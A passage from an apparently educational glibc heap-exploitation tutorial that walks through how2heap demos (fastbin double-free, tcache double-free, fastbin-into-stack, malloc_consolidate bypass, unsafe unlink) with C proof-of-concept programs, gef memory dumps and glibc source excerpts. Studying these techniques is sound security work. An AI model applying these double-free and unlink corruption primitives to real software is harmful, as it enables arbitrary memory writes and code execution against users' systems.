0x602060: 0x0000000000000000 0x0000000000020fa1
0x602070: 0x0000000000000000
gef➤ heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10] ← Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)
After the second free, chunk b is added to the fastbins:
gef➤ x/15gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk a [freed]
0x602010: 0x0000000000000000 0x0000000000000000 <-- fd pointer
0x602020: 0x0000000000000000 0x0000000000000021 <-- chunk b [freed]
0x602030: 0x0000000000602000 0x0000000000000000 <-- fd pointer
0x602040: 0x0000000000000000 0x0000000000000021 <-- chunk c
0x602050: 0x4343434343434343 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000020fa1
0x602070: 0x0000000000000000
gef➤ heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10] ← Chunk(addr=0x602030, size=0x20, flags=PREV_INUSE) ← Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)
Chunk a is now the second chunk in the bin, so the double-free check does not catch it. After the third free, chunk a is added to the fastbins again:
gef➤ x/15gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk a [freed again]
0x602010: 0x0000000000602020 0x0000000000000000 <-- fd pointer
0x602020: 0x0000000000000000 0x0000000000000021 <-- chunk b [freed]
0x602030: 0x0000000000602000 0x0000000000000000 <-- fd pointer
0x602040: 0x0000000000000000 0x0000000000000021 <-- chunk c
0x602050: 0x4343434343434343 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000020fa1
0x602070: 0x0000000000000000
gef➤ heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10] ← Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE) ← Chunk(addr=0x602030, size=0x20, flags=PREV_INUSE) ← Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE) → [loop detected]
Chunk a and chunk b now appear to form a cycle.
After three more mallocs:
gef➤ x/15gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk d, chunk f
0x602010: 0x4646464646464646 0x0000000000000000
0x602020: 0x0000000000000000 0x0000000000000021 <-- chunk e
0x602030: 0x4545454545454545 0x0000000000000000
0x602040: 0x0000000000000000 0x0000000000000021 <-- chunk c
0x602050: 0x4343434343434343 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000020fa1
0x602070: 0x0000000000000000
So with fastbins, a double-free can be used to leak a pointer to a heap chunk.
Recompiling with the memory-checking option:
$ gcc -fsanitize=address -g fastbin_dup.c
$ ./a.out
Allocating 3 buffers.
1st malloc(9) 0x60200000eff0 points to AAAAAAAA
2nd malloc(9) 0x60200000efd0 points to BBBBBBBB
3rd malloc(9) 0x60200000efb0 points to CCCCCCCC
Freeing the first one 0x60200000eff0.
Then freeing another one 0x60200000efd0.
Freeing the first one 0x60200000eff0 again.
=================================================================
==5650==ERROR: AddressSanitizer: attempting double-free on 0x60200000eff0 in thread T0:
#0 0x7fdc18ebf2ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca)
#1 0x400ba3 in main /home/firmy/how2heap/fastbin_dup.c:22
#2 0x7fdc18a7d82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#3 0x400878 in _start (/home/firmy/how2heap/a.out+0x400878)
0x60200000eff0 is located 0 bytes inside of 9-byte region [0x60200000eff0,0x60200000eff9)
freed by thread T0 here:
#0 0x7fdc18ebf2ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca)
#1 0x400b0d in main /home/firmy/how2heap/fastbin_dup.c:18
#2 0x7fdc18a7d82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
previously allocated by thread T0 here:
#0 0x7fdc18ebf602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
#1 0x400997 in main /home/firmy/how2heap/fastbin_dup.c:7
#2 0x7fdc18a7d82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
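This is an obvious double-free bug. How this class of bug is exploited in detail is covered in later chapters.
Now for something newer: in libc-2.26, freeing twice does not trigger the double-free detection at all. This is related to the tcache mechanism, which will be described in detail later. For now, here is an example that does trigger the double-free check on that version: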
#include <stdio.h>
#include <stdlib.h>
int main() {
int i;
void *p = malloc(0x40);
fprintf(stderr, "First allocate a fastbin: p=%p\n", p);
fprintf(stderr, "Then free(p) 7 times\n");
for (i = 0; i < 7; i++) {
fprintf(stderr, "free %d: %p => %p\n", i+1, &p, p);
free(p);
}
fprintf(stderr, "Then malloc 8 times at the same address\n");
int *a[10];
for (i = 0; i < 8; i++) {
a[i] = malloc(0x40);
fprintf(stderr, "malloc %d: %p => %p\n", i+1, &a[i], a[i]);
}
fprintf(stderr, "Finally trigger double-free\n");
for (i = 0; i < 2; i++) {
fprintf(stderr, "free %d: %p => %p\n", i+1, &a[i], a[i]);
free(a[i]);
}
}
$ gcc -g tcache_double-free.c
$ ./a.out
First allocate a fastbin: p=0x559e30950260
Then free(p) 7 times
free 1: 0x7ffc498b2958 => 0x559e30950260
free 2: 0x7ffc498b2958 => 0x559e30950260
free 3: 0x7ffc498b2958 => 0x559e30950260
free 4: 0x7ffc498b2958 => 0x559e30950260
free 5: 0x7ffc498b2958 => 0x559e30950260
free 6: 0x7ffc498b2958 => 0x559e30950260
free 7: 0x7ffc498b2958 => 0x559e30950260
Then malloc 8 times at the same address
malloc 1: 0x7ffc498b2960 => 0x559e30950260
malloc 2: 0x7ffc498b2968 => 0x559e30950260
malloc 3: 0x7ffc498b2970 => 0x559e30950260
malloc 4: 0x7ffc498b2978 => 0x559e30950260
malloc 5: 0x7ffc498b2980 => 0x559e30950260
malloc 6: 0x7ffc498b2988 => 0x559e30950260
malloc 7: 0x7ffc498b2990 => 0x559e30950260
malloc 8: 0x7ffc498b2998 => 0x559e30950260
Finally trigger double-free
free 1: 0x7ffc498b2960 => 0x559e30950260
free 2: 0x7ffc498b2968 => 0x559e30950260
double free or corruption (fasttop)
[2] 1244 abort (core dumped) ./a.out
fastbin_dup_into_stack
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main() {
unsigned long long stack_var = 0x21;
fprintf(stderr, "Allocating 3 buffers.\n");
char *a = malloc(9);
char *b = malloc(9);
char *c = malloc(9);
strcpy(a, "AAAAAAAA");
strcpy(b, "BBBBBBBB");
strcpy(c, "CCCCCCCC");
fprintf(stderr, "1st malloc(9) %p points to %s\n", a, a);
fprintf(stderr, "2nd malloc(9) %p points to %s\n", b, b);
fprintf(stderr, "3rd malloc(9) %p points to %s\n", c, c);
fprintf(stderr, "Freeing the first one %p.\n", a);
free(a);
fprintf(stderr, "Then freeing another one %p.\n", b);
free(b);
fprintf(stderr, "Freeing the first one %p again.\n", a);
free(a);
fprintf(stderr, "Allocating 4 buffers.\n");
unsigned long long *d = malloc(9);
*d = (unsigned long long) (((char*)&stack_var) - sizeof(d));
fprintf(stderr, "4nd malloc(9) %p points to %p\n", d, &d);
char *e = malloc(9);
strcpy(e, "EEEEEEEE");
fprintf(stderr, "5nd malloc(9) %p points to %s\n", e, e);
char *f = malloc(9);
strcpy(f, "FFFFFFFF");
fprintf(stderr, "6rd malloc(9) %p points to %s\n", f, f);
char *g = malloc(9);
strcpy(g, "GGGGGGGG");
fprintf(stderr, "7th malloc(9) %p points to %s\n", g, g);
}
$ gcc -g fastbin_dup_into_stack.c
$ ./a.out
Allocating 3 buffers.
1st malloc(9) 0xcf2010 points to AAAAAAAA
2nd malloc(9) 0xcf2030 points to BBBBBBBB
3rd malloc(9) 0xcf2050 points to CCCCCCCC
Freeing the first one 0xcf2010.
Then freeing another one 0xcf2030.
Freeing the first one 0xcf2010 again.
Allocating 4 buffers.
4nd malloc(9) 0xcf2010 points to 0x7ffd1e0d48b0
5nd malloc(9) 0xcf2030 points to EEEEEEEE
6rd malloc(9) 0xcf2010 points to FFFFFFFF
7th malloc(9) 0x7ffd1e0d48b0 points to GGGGGGGG
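This program shows how to modify the fd pointer so that it points to a forged free chunk, which makes malloc return a chunk at the forged address. Most of the program is the same as the previous one and the bug is again a double-free; only the value written into fd differs.
After the three mallocs: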
gef➤ x/15gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk a
0x602010: 0x4141414141414141 0x0000000000000000
0x602020: 0x0000000000000000 0x0000000000000021 <-- chunk b
0x602030: 0x4242424242424242 0x0000000000000000
0x602040: 0x0000000000000000 0x0000000000000021 <-- chunk c
0x602050: 0x4343434343434343 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000020fa1 <-- top chunk
0x602070: 0x0000000000000000
After the three frees:
gef➤ x/15gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk a [freed twice]
0x602010: 0x0000000000602020 0x0000000000000000 <-- fd pointer
0x602020: 0x0000000000000000 0x0000000000000021 <-- chunk b [freed]
0x602030: 0x0000000000602000 0x0000000000000000 <-- fd pointer
0x602040: 0x0000000000000000 0x0000000000000021 <-- chunk c
0x602050: 0x4343434343434343 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000020fa1
0x602070: 0x0000000000000000
gef➤ heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10] ← Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE) ← Chunk(addr=0x602030, size=0x20, flags=PREV_INUSE) ← Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE) → [loop detected]
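After this malloc we no longer fill in a meaningless "DDDDDDDD". Instead we write an address, namely the stack address minus 0x8, which forges a free chunk on the stack (any other address would work as well). This is also why stack_var is set to 0x21 (0x20 works too): it serves as the size field of the fake chunk that starts at the stack address minus 0x8.
When glibc performs an allocation and the chunk size falls in the fast bin range, it looks for a suitable chunk in the corresponding bin. At that point glibc computes a fastbin index from the candidate chunk's size field and compares it with the index of the bin the chunk was taken from. If the two do not match, the chunk's size field has been corrupted. The size field of the fake chunk therefore has to be set to a correct value.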
/* offset 2 to use otherwise unindexable first 2 bins */
#define fastbin_index(sz) \
((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
{
idx = fastbin_index (nb);
[...]
if (victim != 0)
{
if (__builtin_expect (fastbin_index (chunksize (victim)) != idx, 0))
{
errstr = "malloc(): memory corruption (fast)";
[...]
}
[...]
}
}
Put simply, the fake chunk's size just has to match the size of the double-freed chunk.
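The index comparison can be replayed in Python to see which size values pass. The functions below mirror the fastbin_index macro quoted above and the masking of the three flag bits done by chunksize; `passes_size_check` is a hypothetical helper name, and 64-bit glibc 2.23 is assumed.

```python
SIZE_SZ = 8        # 64-bit target
SIZE_BITS = 0x7    # PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA
U32 = 0xFFFFFFFF   # the macro computes in unsigned int

def chunksize(size_field):
    """Size with the three flag bits masked off."""
    return size_field & ~SIZE_BITS

def fastbin_index(sz):
    shift = 4 if SIZE_SZ == 8 else 3
    return (((sz & U32) >> shift) - 2) & U32

def passes_size_check(size_field, nb):
    """Mimic the comparison malloc makes before returning a fastbin chunk."""
    return fastbin_index(chunksize(size_field)) == fastbin_index(nb)

nb = 0x20   # chunk size for malloc(9)
results = {hex(s): passes_size_check(s, nb) for s in (0x21, 0x20, 0x31, 0x0)}
print(results)
```

Both 0x21 and 0x20 map to index 0 and pass, while 0x31 (index 1) and an uninitialized 0 fail.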
gef➤ x/15gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk d
0x602010: 0x00007fffffffdc30 0x0000000000000000 <-- fd pointer
0x602020: 0x0000000000000000 0x0000000000000021 <-- chunk b [freed]
0x602030: 0x0000000000602000 0x0000000000000000 <-- fd pointer
0x602040: 0x0000000000000000 0x0000000000000021 <-- chunk c
0x602050: 0x4343434343434343 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000020fa1
0x602070: 0x0000000000000000
gef➤ p &stack_var
$4 = (unsigned long long *) 0x7fffffffdc38
gef➤ x/5gx 0x7fffffffdc38-0x8
0x7fffffffdc30: 0x0000000000000000 0x0000000000000021 <-- fake chunk [seems to be freed]
0x7fffffffdc40: 0x0000000000602010 0x0000000000602010 <-- fd pointer
0x7fffffffdc50: 0x0000000000602030
gef➤ heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10] ← Chunk(addr=0x602030, size=0x20, flags=PREV_INUSE) ← Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE) ← Chunk(addr=0x7fffffffdc40, size=0x20, flags=PREV_INUSE) ← Chunk(addr=0x602020, size=0x0, flags=) [incorrect fastbin_index]
As you can see, the forged chunk is now linked into the fastbins through the pointer. Calling malloc two more times moves the forged chunk to the head of the list:
gef➤ x/15gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021
0x602010: 0x4646464646464646 0x0000000000000000
0x602020: 0x0000000000000000 0x0000000000000021
0x602030: 0x4545454545454545 0x0000000000000000
0x602040: 0x0000000000000000 0x0000000000000021
0x602050: 0x4343434343434343 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000020fa1
0x602070: 0x0000000000000000
gef➤ heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10] ← Chunk(addr=0x7fffffffdc40, size=0x20, flags=PREV_INUSE) ← Chunk(addr=0x602020, size=0x0, flags=) [incorrect fastbin_index]
One more malloc allocates memory at the fake chunk:
gef➤ x/5gx 0x7fffffffdc38-0x8
0x7fffffffdc30: 0x0000000000000000 0x0000000000000021 <-- fake chunk
0x7fffffffdc40: 0x4747474747474747 0x0000000000602000
0x7fffffffdc50: 0x0000000000602030
So with fastbins, a double-free can be used to overwrite the fastbin structure and obtain a pointer to an arbitrary address.
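The whole sequence can be replayed on a toy memory model to check the order in which chunks come back. The sketch assumes a single fastbin, stores 8-byte words in a dictionary, and reuses the addresses from the gdb session in this section; the `free` and `malloc` functions here are simplified stand-ins, not glibc code.

```python
HDR = 0x10                   # prev_size + size in front of the user data
A, B = 0x602000, 0x602020    # chunk a and chunk b
FAKE = 0x7FFFFFFFDC30        # &stack_var - 0x8

mem = {A + 8: 0x21, B + 8: 0x21, FAKE + 8: 0x21}   # size fields only
head = 0                                           # top of the fastbin, 0 = empty

def free(ptr):
    global head
    chunk = ptr - HDR
    if chunk == head:
        raise RuntimeError("double free or corruption (fasttop)")
    mem[chunk + HDR] = head          # fd lives in the first user word
    head = chunk

def malloc():
    global head
    victim = head
    if (mem[victim + 8] & ~0x7) != 0x20:
        raise RuntimeError("malloc(): memory corruption (fast)")
    head = mem.get(victim + HDR, 0)  # the next top is whatever fd says
    return victim + HDR

a, b = A + HDR, B + HDR
free(a); free(b); free(a)            # double free with b in between
d = malloc()                         # returns a, which is still in the bin
mem[d] = FAKE                        # overwrite the fd of the freed copy
e = malloc()
f = malloc()
g = malloc()                         # follows the forged fd
print(hex(d), hex(e), hex(f), hex(g))
```

The fourth allocation lands at the fake chunk's user address, 0x10 bytes past the forged header, which matches the Chunk(addr=0x7fffffffdc40) entry in the gef output.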
fastbin_dup_consolidate
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
int main() {
void *p1 = malloc(0x10);
void *p2 = malloc(0x10);
strcpy(p1, "AAAAAAAA");
strcpy(p2, "BBBBBBBB");
fprintf(stderr, "Allocated two fastbins: p1=%p p2=%p\n", p1, p2);
fprintf(stderr, "Now free p1!\n");
free(p1);
void *p3 = malloc(0x400);
fprintf(stderr, "Allocated large bin to trigger malloc_consolidate(): p3=%p\n", p3);
fprintf(stderr, "In malloc_consolidate(), p1 is moved to the unsorted bin.\n");
free(p1);
fprintf(stderr, "Trigger the double free vulnerability!\n");
fprintf(stderr, "We can pass the check in malloc() since p1 is not fast top.\n");
void *p4 = malloc(0x10);
strcpy(p4, "CCCCCCC");
void *p5 = malloc(0x10);
strcpy(p5, "DDDDDDDD");
fprintf(stderr, "Now p1 is in unsorted bin and fast bin. So we'will get it twice: %p %p\n", p4, p5);
}
$ gcc -g fastbin_dup_consolidate.c
$ ./a.out
Allocated two fastbins: p1=0x17c4010 p2=0x17c4030
Now free p1!
Allocated large bin to trigger malloc_consolidate(): p3=0x17c4050
In malloc_consolidate(), p1 is moved to the unsorted bin.
Trigger the double free vulnerability!
We can pass the check in malloc() since p1 is not fast top.
Now p1 is in unsorted bin and fast bin. So we'will get it twice: 0x17c4010 0x17c4010
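This program shows how the malloc_consolidate mechanism, triggered by a large bin allocation, can be used to bypass the fastbin double-free check. That check was already shown in fastbin_dup, which got around it by inserting a free of another chunk between the two frees.
First, allocate two fast chunks: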
gef➤ x/15gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk p1
0x602010: 0x4141414141414141 0x0000000000000000
0x602020: 0x0000000000000000 0x0000000000000021 <-- chunk p2
0x602030: 0x4242424242424242 0x0000000000000000
0x602040: 0x0000000000000000 0x0000000000020fc1 <-- top chunk
0x602050: 0x0000000000000000 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000000000
0x602070: 0x0000000000000000
Free p1, and the free chunk is added to the fastbins:
gef➤ x/15gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk p1 [freed]
0x602010: 0x0000000000000000 0x0000000000000000
0x602020: 0x0000000000000000 0x0000000000000021 <-- chunk p2
0x602030: 0x4242424242424242 0x0000000000000000
0x602040: 0x0000000000000000 0x0000000000020fc1 <-- top chunk
0x602050: 0x0000000000000000 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000000000
0x602070: 0x0000000000000000
gef➤ heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10] ← Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)
Freeing p1 again at this point would certainly trigger the double-free error. If we allocate a large chunk instead, the result is:
gef➤ x/15gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk p1 [freed]
0x602010: 0x00007ffff7dd1b88 0x00007ffff7dd1b88 <-- fd, bk pointer
0x602020: 0x0000000000000020 0x0000000000000020 <-- chunk p2
0x602030: 0x4242424242424242 0x0000000000000000
0x602040: 0x0000000000000000 0x0000000000000411 <-- chunk p3
0x602050: 0x0000000000000000 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000000000
0x602070: 0x0000000000000000
gef➤ heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10] 0x00
gef➤ heap bins small
[ Small Bins for arena 'main_arena' ]
[+] small_bins[1]: fw=0x602000, bk=0x602000
→ Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)
[+] Found 1 chunks in 1 small non-empty bins.
The chunk has disappeared from the fastbins and shown up in the small bins instead, and the prev_size and size fields of chunk p2 have both been modified.
Let's look at how a large chunk is allocated:
/*
If this is a large request, consolidate fastbins before continuing.
While it might look excessive to kill all fastbins before
even seeing if there is space available, this avoids
fragmentation problems normally associated with fastbins.
Also, in practice, programs tend to have runs of either small or
large requests, but less often mixtures, so consolidation is not
invoked all that often in most programs. And the programs that
it is called frequently in otherwise tend to fragment.
*/
else
{
idx = largebin_index (nb);
if (have_fastchunks (av))
malloc_consolidate (av);
}
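When a large chunk is requested, malloc first computes the large bin index from the chunk size and then checks whether the fastbins of the current arena hold any chunks. If they do, it calls malloc_consolidate() to merge the fastbin chunks and move the resulting free chunks into the unsorted bin. Because the request here is for a large chunk, the chunks in the unsorted bin are then sorted back into the small bins or large bins according to their size.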
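To see why the allocation in this example takes the large-request path, here is a minimal sketch of the size arithmetic. It assumes a 64-bit glibc 2.23 layout (SIZE_SZ = 8, 16-byte alignment, MINSIZE = 0x20, large chunks starting at 0x400); toy_request2size and toy_is_large_request are illustrative helper names, not glibc functions.

```c
#include <stddef.h>

/* Assumed 64-bit glibc 2.23 constants (illustrative, not read from libc). */
#define TOY_SIZE_SZ        8UL
#define TOY_ALIGN_MASK     15UL      /* MALLOC_ALIGNMENT - 1 */
#define TOY_MINSIZE        0x20UL
#define TOY_MIN_LARGE_SIZE 0x400UL   /* first chunk size outside the small bin range */

/* Convert a user request into a chunk size, mirroring the request2size() macro. */
size_t toy_request2size(size_t req)
{
    size_t sz = req + TOY_SIZE_SZ + TOY_ALIGN_MASK;
    if (sz < TOY_MINSIZE)
        return TOY_MINSIZE;
    return sz & ~TOY_ALIGN_MASK;
}

/* A request is "large" when its chunk size is outside the small bin range. */
int toy_is_large_request(size_t req)
{
    return toy_request2size(req) >= TOY_MIN_LARGE_SIZE;
}
```

Under these assumptions, a malloc(0x400) request becomes a 0x410-byte chunk, which matches the 0x411 size field of chunk p3 in the dump above, and it is large enough to trigger malloc_consolidate when the fastbins are not empty.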
Since p1 is no longer at the top of the fastbin, it can be freed again:
gef➤ x/15gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk p1 [double freed]
0x602010: 0x0000000000000000 0x00007ffff7dd1b88
0x602020: 0x0000000000000020 0x0000000000000020 <-- chunk p2
0x602030: 0x4242424242424242 0x0000000000000000
0x602040: 0x0000000000000000 0x0000000000000411 <-- chunk p3
0x602050: 0x0000000000000000 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000000000
0x602070: 0x0000000000000000
gef➤ heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10] ← Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)
gef➤ heap bins small
[ Small Bins for arena 'main_arena' ]
[+] small_bins[1]: fw=0x602000, bk=0x602000
→ Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)
[+] Found 1 chunks in 1 small non-empty bins.
p1 has been placed in the fastbins again, so it now sits in both the fastbins and the small bins.
The first malloc takes the chunk from the fastbins:
gef➤ x/15gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk p1 [be freed], chunk p4
0x602010: 0x0043434343434343 0x00007ffff7dd1b88
0x602020: 0x0000000000000020 0x0000000000000020 <-- chunk p2
0x602030: 0x4242424242424242 0x0000000000000000
0x602040: 0x0000000000000000 0x0000000000000411 <-- chunk p3
0x602050: 0x0000000000000000 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000000000
0x602070: 0x0000000000000000
gef➤ heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10] 0x00
gef➤ heap bins small
[ Small Bins for arena 'main_arena' ]
[+] small_bins[1]: fw=0x602000, bk=0x602000
→ Chunk(addr=0x602010, size=0x20, flags=PREV_INUSE)
[+] Found 1 chunks in 1 small non-empty bins.
The second malloc takes the chunk from the small bins:
gef➤ x/15gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk p4, chunk p5
0x602010: 0x4444444444444444 0x00007ffff7dd1b00
0x602020: 0x0000000000000020 0x0000000000000021 <-- chunk p2
0x602030: 0x4242424242424242 0x0000000000000000
0x602040: 0x0000000000000000 0x0000000000000411 <-- chunk p3
0x602050: 0x0000000000000000 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000000000
0x602070: 0x0000000000000000
Chunks p4 and p5 are at the same address.
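The whole sequence can be replayed on a toy model without touching the real allocator. The sketch below is an assumption-laden simplification: one fastbin and one small bin, both modeled as stacks of pointers, with no real merging. All names (toy_arena, toy_free, toy_consolidate, toy_malloc) are hypothetical. It only illustrates that the double-free check compares against the fastbin top, so moving the chunk out of the fastbin lets a second free succeed.

```c
#include <stddef.h>

#define TOY_BIN_CAP 8

/* One fastbin and one small bin, both modeled as stacks of pointers. */
struct toy_arena {
    void *fast[TOY_BIN_CAP];
    int nfast;
    void *small[TOY_BIN_CAP];
    int nsmall;
};

/* Free p into the fastbin. Only the top entry is compared, like the
   "double free or corruption (fasttop)" check. Returns 0 on success. */
int toy_free(struct toy_arena *av, void *p)
{
    if (av->nfast > 0 && av->fast[av->nfast - 1] == p)
        return -1;                       /* double free detected */
    if (av->nfast == TOY_BIN_CAP)
        return -2;                       /* toy bin is full */
    av->fast[av->nfast++] = p;
    return 0;
}

/* Move every fastbin entry to the small bin (no real merging is modeled). */
void toy_consolidate(struct toy_arena *av)
{
    while (av->nfast > 0 && av->nsmall < TOY_BIN_CAP)
        av->small[av->nsmall++] = av->fast[--av->nfast];
}

/* Serve a request from the fastbin first, then from the small bin. */
void *toy_malloc(struct toy_arena *av)
{
    if (av->nfast > 0)
        return av->fast[--av->nfast];
    if (av->nsmall > 0)
        return av->small[--av->nsmall];
    return NULL;
}
```

Calling toy_free twice in a row on the same pointer is rejected, but toy_free, toy_consolidate, toy_free is accepted, and the next two toy_malloc calls return the same address, just like p4 and p5.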
unsafe_unlink
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
uint64_t *chunk0_ptr;
int main() {
int malloc_size = 0x80; // not fastbins
int header_size = 2;
chunk0_ptr = (uint64_t*) malloc(malloc_size); //chunk0
uint64_t *chunk1_ptr = (uint64_t*) malloc(malloc_size); //chunk1
fprintf(stderr, "The global chunk0_ptr is at %p, pointing to %p\n", &chunk0_ptr, chunk0_ptr);
fprintf(stderr, "The victim chunk we are going to corrupt is at %p\n\n", chunk1_ptr);
// pass this check: (P->fd->bk != P || P->bk->fd != P) == False
chunk0_ptr[2] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*3);
chunk0_ptr[3] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*2);
fprintf(stderr, "Fake chunk fd: %p\n", (void*) chunk0_ptr[2]);
fprintf(stderr, "Fake chunk bk: %p\n\n", (void*) chunk0_ptr[3]);
// pass this check: (chunksize(P) != prev_size (next_chunk(P))) == False
// chunk0_ptr[1] = 0x0; // or 0x8, 0x80
uint64_t *chunk1_hdr = chunk1_ptr - header_size;
chunk1_hdr[0] = malloc_size;
chunk1_hdr[1] &= ~1;
// deal with tcache
// int *a[10];
// int i;
// for (i = 0; i < 7; i++) {
// a[i] = malloc(0x80);
// }
// for (i = 0; i < 7; i++) {
// free(a[i]);
// }
free(chunk1_ptr);
char victim_string[9];
strcpy(victim_string, "AAAAAAAA");
chunk0_ptr[3] = (uint64_t) victim_string;
fprintf(stderr, "Original value: %s\n", victim_string);
chunk0_ptr[0] = 0x4242424242424242LL;
fprintf(stderr, "New Value: %s\n", victim_string);
}
$ gcc -g unsafe_unlink.c
$ ./a.out
The global chunk0_ptr is at 0x601070, pointing to 0x721010
The victim chunk we are going to corrupt is at 0x7210a0
Fake chunk fd: 0x601058
Fake chunk bk: 0x601060
Original value: AAAAAAAA
New Value: BBBBBBBB
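This program shows how free can be abused to overwrite the global pointer chunk0_ptr and obtain an arbitrary memory write, a technique known as unsafe unlink. The most common scenario is a heap overflow combined with a global pointer to the overflowed chunk.
Ubuntu 16.04 ships libc-2.23. Its unlink implementation is shown below; it contains several checks on the neighboring chunks, and these are what we need to bypass: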
/* Take a chunk off a bin list */
#define unlink(AV, P, BK, FD) { \
FD = P->fd; \
BK = P->bk; \
if (__builtin_expect (FD->bk != P || BK->fd != P, 0)) \
malloc_printerr (check_action, "corrupted double-linked list", P, AV); \
else { \
FD->bk = BK; \
BK->fd = FD; \
if (!in_smallbin_range (P->size) \
&& __builtin_expect (P->fd_nextsize != NULL, 0)) { \
if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0) \
|| __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0)) \
malloc_printerr (check_action, \
"corrupted double-linked list (not small)", \
P, AV); \
if (FD->fd_nextsize == NULL) { \
if (P->fd_nextsize == P) \
FD->fd_nextsize = FD->bk_nextsize = FD; \
else { \
FD->fd_nextsize = P->fd_nextsize; \
FD->bk_nextsize = P->bk_nextsize; \
P->fd_nextsize->bk_nextsize = FD; \
P->bk_nextsize->fd_nextsize = FD; \
} \
} else { \
P->fd_nextsize->bk_nextsize = P->bk_nextsize; \
P->bk_nextsize->fd_nextsize = P->fd_nextsize; \
} \
} \
} \
}
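Before unlinking, the integrity of the doubly linked list is checked through P's own fd and bk: the bk pointer of the chunk that P->fd points to must point back to P, and the fd pointer of the chunk that P->bk points to must point back to P.
malloc_size is set to 0x80 so that the allocations are small chunks rather than fast chunks, and header_size is defined as 2. Two chunks are allocated: the global pointer chunk0_ptr points to chunk0 and the local pointer chunk1_ptr points to chunk1: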
gef➤ p &chunk0_ptr
$1 = (uint64_t **) 0x601070 <chunk0_ptr>
gef➤ x/gx &chunk0_ptr
0x601070 <chunk0_ptr>: 0x0000000000602010
gef➤ p &chunk1_ptr
$2 = (uint64_t **) 0x7fffffffdc60
gef➤ x/gx &chunk1_ptr
0x7fffffffdc60: 0x00000000006020a0
gef➤ x/40gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000091 <-- chunk 0
0x602010: 0x0000000000000000 0x0000000000000000
0x602020: 0x0000000000000000 0x0000000000000000
0x602030: 0x0000000000000000 0x0000000000000000
0x602040: 0x0000000000000000 0x0000000000000000
0x602050: 0x0000000000000000 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000000000
0x602070: 0x0000000000000000 0x0000000000000000
0x602080: 0x0000000000000000 0x0000000000000000
0x602090: 0x0000000000000000 0x0000000000000091 <-- chunk 1
0x6020a0: 0x0000000000000000 0x0000000000000000
0x6020b0: 0x0000000000000000 0x0000000000000000
0x6020c0: 0x0000000000000000 0x0000000000000000
0x6020d0: 0x0000000000000000 0x0000000000000000
0x6020e0: 0x0000000000000000 0x0000000000000000
0x6020f0: 0x0000000000000000 0x0000000000000000
0x602100: 0x0000000000000000 0x0000000000000000
